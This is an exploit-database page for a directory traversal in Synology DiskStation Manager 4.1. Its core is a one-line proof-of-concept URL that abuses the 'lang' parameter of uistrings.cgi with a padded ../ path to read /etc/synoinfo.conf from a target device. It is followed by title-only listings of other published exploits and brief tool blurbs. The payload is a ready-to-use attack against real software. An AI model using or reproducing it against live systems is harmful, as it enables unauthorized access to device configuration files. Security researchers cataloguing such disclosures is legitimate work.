Menu

Search for hundreds of thousands of exploits

"Synology DiskStation Manager 4.1 - Directory Traversal"

Author

Exploit author

"Berk Dusunur"

Platform

Exploit platform

linux

Release date

Exploit published date

2018-07-23

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
# Exploit Title: Synology DiskStation Manager 4.1 - Directory Traversal
# Google Dork: N/A
# Date: 2018-07-21
# Exploit Author: Berk Dusunur
# Vendor Homepage: https://www.synology.com
# Software Link: https://www.synology.com
# Version: v4.1
# Tested on: Parrot OS
# CVE : N/A

# PoC

http://target:8888/scripts/uistrings.cgi?lang=.////////////////////////////////////////////////////////////////////////////////////////../../../../../etc/synoinfo.conf
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-11-27 "libupnp 1.6.18 - Stack-based buffer overflow (DoS)" dos linux "Patrik Lantz"
2020-11-24 "ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)" webapps linux "Giuseppe Fuggiano"
2020-10-28 "aptdaemon < 1.1.1 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "Blueman < 2.1.4 - Local Privilege Escalation" local linux "Vaisha Bernard"
2020-10-28 "Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion" webapps linux "Ivo Palazzolo"
2020-10-28 "PackageKit < 1.1.13 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-09-11 "Gnome Fonts Viewer 3.34.0 - Heap Corruption" local linux "Cody Winkler"
2020-07-10 "Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution" remote linux SpicyItalian
2020-07-06 "Grafana 7.0.1 - Denial of Service (PoC)" dos linux mostwanted002
Release Date Title Type Platform Author
2020-05-28 "NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection" webapps multiple "Berk Dusunur"
2020-05-28 "Online-Exam-System 2015 - 'fid' SQL Injection" webapps php "Berk Dusunur"
2020-01-29 "Liferay CE Portal 6.0.2 - Remote Command Execution" webapps java "Berk Dusunur"
2018-10-29 "Grapixel New Media 2 - 'pageref' SQL Injection" webapps php "Berk Dusunur"
2018-08-23 "PCViewer vt1000 - Directory Traversal" webapps windows "Berk Dusunur"
2018-07-23 "Synology DiskStation Manager 4.1 - Directory Traversal" webapps linux "Berk Dusunur"
2018-07-23 "NUUO NVRmini - 'upgrade_handle.php' Remote Command Execution" webapps hardware "Berk Dusunur"
2018-07-22 "GeoVision GV-SNVR0811 - Directory Traversal" webapps hardware "Berk Dusunur"
2018-07-16 "WordPress Plugin Job Manager 4.1.0 - Cross-Site Scripting" webapps php "Berk Dusunur"
2018-07-10 "WolfSight CMS 3.2 - SQL Injection" webapps php "Berk Dusunur"
2018-06-28 "hycus CMS 1.0.4 - Authentication Bypass" webapps php "Berk Dusunur"
2018-06-22 "phpLDAPadmin 1.2.2 - 'server_id' LDAP Injection (Username)" webapps php "Berk Dusunur"
2018-06-20 "NewMark CMS 2.1 - 'sec_id' SQL Injection" webapps linux "Berk Dusunur"
2018-06-18 "Redatam Web Server < 7 - Directory Traversal" webapps windows "Berk Dusunur"
2018-05-21 "Zenar Content Management System - Cross-Site Scripting" webapps php "Berk Dusunur"
2018-05-18 "Monstra CMS < 3.0.4 - Cross-Site Scripting (2)" webapps php "Berk Dusunur"
2018-03-26 "Acrolinx Server < 5.2.5 - Directory Traversal" remote windows "Berk Dusunur"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.